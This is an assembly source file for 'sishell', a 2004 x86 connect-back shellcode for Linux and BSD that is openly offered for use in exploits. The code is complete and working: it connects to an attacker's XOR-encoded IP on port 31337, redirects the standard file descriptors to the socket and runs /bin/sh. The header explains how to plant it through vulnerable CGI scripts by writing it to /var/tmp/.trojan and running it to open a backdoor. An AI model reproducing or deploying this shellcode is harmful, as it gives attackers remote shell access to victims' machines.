;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
; Shadowinteger's connecting (reverse) shellcode (sishell) $Revision: 1.12 $
; Copyright (C) 2004 Shadowinteger <shadowinteger@sentinix.org>
;
; sishell is a multi-purpose multi-platform shellcode. You may both generate
; shellcode that doesn't contain any nulls and generate a stand alone
; executable (for use in, e.g., webserver script exploits).
;
; sishell currently runs on these x86 systems: Linux, FreeBSD and NetBSD.
; Stand alone executable shellcode is not yet supported for OpenBSD, I need to
; do more research to get it to run. "scprocessor" won't execute the *BSD
; non-null (real) shellcode, something about non-executable memory? Need to do
; a lot more research around OpenBSD, any help is appreciated! I do run
; OpenBSD (part of my LabNET), and I am starting to love it. The OpenBSD
; creators have approached security "the right way".
;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
; sishell is distributed under the MIT license:
;
; Permission is hereby granted, free of charge, to any person obtaining a copy
; of this software and associated documentation files (the "Software"), to deal
; in the Software without restriction, including without limitation the rights
; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
; copies of the Software, and to permit persons to whom the Software is
; furnished to do so, subject to the following conditions:
;
; The above copyright notice and this permission notice shall be included in
; all copies or substantial portions of the Software.
;
; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
; SOFTWARE.
;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
; Mini HOWTO:
;
;   The ip address and port to connect back to is embedded inside the output
;   binary. scprocessor.c (comes with the sishell package) will find/guess the
;   offset to where to change both IP and port. The IP address (only the IP
;   address, not the port) is XORed. XORing in shellcode is a technique used to
;   avoid null bytes in various ways (among other things). By default, the IP
;   address is xored 0xffffffff, which means that you can not have an IP with
;   255 in it somewhere or else you'll get nulls. This is fine since 255 is
;   used for broadcast and not real IPs. The port is plain network byte order,
;   which means that it can't contain any nulls, e.g. port 13312 can't be used
;   since it contains a null. Your exploit code will have to check if your
;   connect-back port is valid.
;
;   When generating stand alone shellcode (i.e. elfs) you'll end up with lots
;   of nulls. This is fine (IMHO) because stand alone shellcode would only be
;   used in script vulnerabilities/exploits. For example, webserver cgi script
;   sexy.cgi (or .php, .asp, .py or whatever) is vulnerable and can be used to
;   execute system commands on the box. Here we could feed it commands that
;   would allow us to download (wget, for instance) a stand alone shellcode on
;   the target and then tell the sexy.cgi to execute it. But, there is another
;   method too. We simply inject the entire shellcode (much like buffer
;   overflow attacks) by executing perl -e, printf, python -c or echo -ne
;   (e.g.) on the target and feed either of those commands an ascii-encoded
;   octal string, which is our entire stand alone shellcode (nulls will work
;   fine here, they're not nulls, but ascii-encoded). The output of printf,
;   perl -e, etc. should be directed to a temporary file ("> /var/tmp/.trojan")
;   and then chmodded +x and finally executed, opening the backdoor.
;
;   Read the README file for more specific info on how to use perl, printf,
;   echo and python to inject arbitrary data. You'll also find ready-to-use
;   binary shellcode for all supported operating systems in there.
;
;
; If you want a stand alone executable shellcode, compile like this:
; $ nasm -f elf -Dstand_alone -DLINUX -o sishell sishell.asm
;
; If you don't want a stand alone executable, compile it like this:
; $ nasm -f bin -DLINUX -o sishell sishell.asm
; or...
; $ nasm -f bin -DBSD -o sishell sishell.asm
;       (to create an x86 *bsd compatible shellcode)
;
; $Id: sishell.asm,v 1.12 2004/03/29 03:13:17 shadow Exp $
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
BITS 32

; Uncomment the row below if you want a stand alone executable. Leave commented
; out to compile shellcode to inject into a running binary program (buffer
; overflow injection). stand_alone means that you want to create a stand alone
; executable to, e.g., execute through a cgi script vulnerability (or other
; script vulnerability).
;%define stand_alone

;
%define exor    0xffffffff
%define my_ip   0xfeffff80  ; ip xored with exor var
%define my_port 0x697a      ; network byte order (not host byte order) of port 31337.
                            ; the port number is not xored, i.e. only the ip address
                            ; is xored!

; these are both for Linux and *BSD
%define AF_INET         2
%define SOCK_STREAM     1
%define PROTOCOL        6

%ifdef LINUX
    %define sys_write       4
    %define sys_execve      11
    %define sys_dup2        63
    %define sys_socketcall  102

    %define SYS_SOCKET      1
    %define SYS_CONNECT     3

    %define AF_INET         2
    %define SOCK_STREAM     1
    %define PROTOCOL        6
%else
    ; else, assume it's x86 *bsd
    %define sys_write       4
    %define sys_execve      59
    %define sys_socket      97
    %define sys_connect     98
    %define sys_dup2        90
%endif



%ifdef stand_alone
;
; Something about the ELF format's OS ABI identification number...
;
; FreeBSD echo:
; hexdump -n10 -C /bin/echo
; 00000000  7f 45 4c 46 01 01 01 09  00 00                    |.ELF......|
;
; Linux echo:
; shadow:/www/html/s$ hexdump -n10 -C /bin/echo
; 00000000  7f 45 4c 46 01 01 01 00  00 00                    |.ELF......|
;
; NetBSD echo:
; 00000000  7f 45 4c 46 01 01 01 00  00 00                    |.ELF......|
; 0000000a
;
; Conclusion: FreeBSD's number is 9 (offset 7, OS ABI number). Linux and NetBSD
; has 0 (SYSV/NONE). GNU/Linux could have 3 (the number for Linux). NetBSD's
; number is 2.
;
; FreeBSD doesn't need to have a .note.ABI-tag section to do the right thing,
; so we won't include it. If you want it, just uncomment below.
;
;   %ifdef FREEBSD
;       ; FreeBSD, NetBSD and OpenBSD all want a special .note tags
;       ; to decide which emulation to run the program under. We
;       ; want to run the program with native emulation, i.e. no
;       ; emulation.
;       ;
;       ; $ objdump -sx /bin/echo
;       ; {skip to the very end...}
;       ; Contents of section .note.ABI-tag:
;       ;  8048094 08000000 04000000 01000000 46726565  ............Free
;       ;  80480a4 42534400 76a50700                    BSD.v...        
;       ;
;       section .note.ABI-tag progbits alloc noexec nowrite
;           dd 8        ; length of "FreeBSD\0"
;           dd 4
;           dd 1
;           db "FreeBSD",0
;           dd 0        ; "for OS version x", let it be 0.0
;           ;db 0x76,0xa5,0x07,0x00  ; this is for FreeBSD 5.0.1.something
;   %endif
;
    %ifdef NETBSD
        ;
        ; NetBSD will think the stand alone executable should run under SVR4
        ; emulation (doh!), even if we brutebrand it with the brutebrander.
        ; netbsd identifies native progs using a .note.netbsd.ident section, so
        ; we fabricate that...
        ;
        ; This is an example of such a section:
        ;
        ; $ objdump -sx /bin/echo
        ; {lots of stuff here..., but we want the last part...}
        ;
        ; Contents of section .note.netbsd.ident:
        ;  8048094 07000000 04000000 01000000 4e657442  ............NetB
        ;  80480a4 53440000 e10c0300                    SD......        
        ;
        ; this was really tricky to figure out to do...
        ; there should be some netbsd elf documentation somewhere!
        section .note.netbsd.ident progbits alloc noexec nowrite
            dd 7        ; length of "NetBSD\0"
            dd 4
            dd 1
            db "NetBSD",0,0
            dd 0
            ;db 0xe1,0x0c,0x03,0x00  ; "for NetBSD version something"
    %elifdef OPENBSD
        section .note.openbsd.ident progbits alloc noexec nowrite
            dd 8    ; length of "OpenBSD\0"
            dd 4
            dd 1
            db "OpenBSD",0
            dd 0
    %endif

    section .text
    global _start
    _start:
        ; start by saving the environment (hey, suddenly we're greenpeace)
        mov eax,[esp]
        inc eax
        inc eax
        lea ebx,[esp+eax*4]
        mov ebp,ebx     ; save it in ebp
%else
    jmp short get_delta

    shellcode:
        pop ebp     ; store delta address in ebp
%endif

%ifdef LINUX
    ; *************************************************************************
    ; x86 Linux shellcode
    ; *************************************************************************

    ;
    ; create new socket... socket(2,1,6);
    ;

    ; we use the stack for this operation, it'll save us
    ; lots of space
    push byte PROTOCOL
    push byte SOCK_STREAM
    push byte AF_INET
    lea ecx,[esp]
    xor ebx,ebx
    mov bl, SYS_SOCKET
    xor eax,eax
    mov al, sys_socketcall
    int 0x80

    mov edi,eax     ; socket descriptor in eax, save into edi

    ; fabricate a sockaddr on the stack
    ; first, reserve space
    sub esp, byte 8

    xor ecx,ecx
    mov byte [esp], AF_INET
    mov byte [esp+1], cl
    mov dword eax, my_ip        ; xor'ed 0xffffffff ip address
    xor dword eax, exor         ; xor eax 0xffffffff to get real ip
    mov word [esp+2], my_port   ; the port is _not_ xor'ed
    mov dword [esp+4], eax      ; save ip address in sockaddr
    lea eax,[esp]       ; load effective address of sockaddr struct (on stack)

    ; reserve space on stack
    sub esp, byte 16

    mov [esp], edi      ; socket (file) descriptor
    mov [esp+4], eax    ; save address of sockaddr
    xor eax,eax
    mov al, 16
    mov [esp+8], eax
    xor eax,eax
    mov al, sys_socketcall
    xor ebx,ebx
    mov bl, SYS_CONNECT
    lea ecx,[esp]
    int 0x80
    test eax,eax        ; if connect fails, bail out
    js short exit

    xor ecx,ecx
.duploop:               ; dup2(sd, 0); dup2(sd, 1); dup2(sd, 2); 
    xor eax,eax
    mov al, sys_dup2
    mov ebx,edi
    int 0x80
    inc ecx
    cmp cl, 2
%ifdef stand_alone
    jbe short .duploop
%else
    ja short after_duploop
    jmp short .duploop
    get_delta:
        jmp short get_delta_finaljmp
%endif

after_duploop:
    ; reserve some stack
    sub esp, byte 3*4
    lea eax,[esp+8]
    mov [esp],eax
    xor ebx,ebx
    mov [esp+4],ebx
    mov [esp+8],ebx

%ifdef stand_alone
    mov ebx, program
%else
    mov byte [ebp+7], bl
    mov ebx,ebp
%endif
    lea ecx,[esp]
%ifdef stand_alone
    mov edx,ebp
%else
    xor edx,edx
%endif
    xor eax,eax
    mov al, sys_execve
    int 0x80

exit:
    ; exit, should not reach here
    xor eax,eax
    mov ebx,eax
    inc eax
    int 0x80        ; exit(0)

;.error:
;    xor eax,eax
;    inc eax
;    mov ebx,eax
;    int 0x80       ; exit(1)

%else

    ; *************************************************************************
    ; x86 *BSD shellcode
    ; *************************************************************************

    ;
    ; create new socket... socket(2,1,6);
    ;
    push byte PROTOCOL
    push byte SOCK_STREAM
    push byte AF_INET
    xor eax,eax
    mov al, sys_socket
    push eax        ; push a dword on the stack to align to the *bsd calling convention
    int 0x80

    mov edi,eax     ; socket descriptor in eax, save into edi

    ; fabricate a sockaddr on the stack
    ; first, reserve space
    sub esp, byte 8

    xor ecx,ecx
    mov byte [esp], AF_INET
    mov byte [esp+1], cl
    mov dword eax, my_ip        ; xor'ed 0xffffffff ip address
    xor dword eax, exor         ; xor eax 0xffffffff to get real ip
    mov word [esp+2], my_port   ; the port is _not_ xor'ed
    mov dword [esp+4], eax      ; save ip address in sockaddr
    lea eax, [esp]      ; load effective address of sockaddr struct (on stack)

    push byte 16    ; push socklen_t addrlen
    push eax        ; push the sockaddr struct
    push edi        ; push the file descriptor
    xor eax,eax
    mov al, sys_connect
    push eax
    int 0x80
    jc short .exit  ; *bsd uses the carry flag to indicate an error

    xor ecx,ecx
.duploop:           ; dup2(sd, 0); dup2(sd, 1); dup2(sd, 2); 
    push ecx        ; newfd
    push edi        ; oldfd
    xor eax,eax
    mov al, sys_dup2
    push eax
    int 0x80
    inc ecx
    cmp cl, 2
    jbe short .duploop

    ; reserve some stack
    sub esp, byte 3*4
    lea eax,[esp+8]
    mov [esp],eax
    xor ebx,ebx
    mov [esp+4],ebx
    mov [esp+8],ebx
    lea ecx,[esp]   ; ecx will point to argv

%ifdef stand_alone
    push ebp        ; push environment pointer (envp)
%else
    push ebx        ; null envp
%endif

    push ecx        ; push argv

%ifdef stand_alone
    push dword program
%else
    mov byte [ebp+7], al    ; al is already 0
    push ebp
%endif
    xor eax,eax
    mov al, sys_execve
    push eax
    int 0x80
.exit:
    ; we should not end up here
    xor eax,eax
    push eax
    inc al
    push eax
    int 0x80        ; exit(0)

;.error:
;    xor eax,eax
;    inc al
;    push eax
;    push eax
;    int 0x80        ; exit(1)

%endif

%ifdef stand_alone
    program db "/bin/sh",0
%else
    %ifdef LINUX
        get_delta_finaljmp:
    %else
        get_delta:
    %endif
        call shellcode
        program db "/bin/sh$"
%endif

;**************** shadowinteger's sishell (c) 2004 <shadowinteger@sentinix.org>
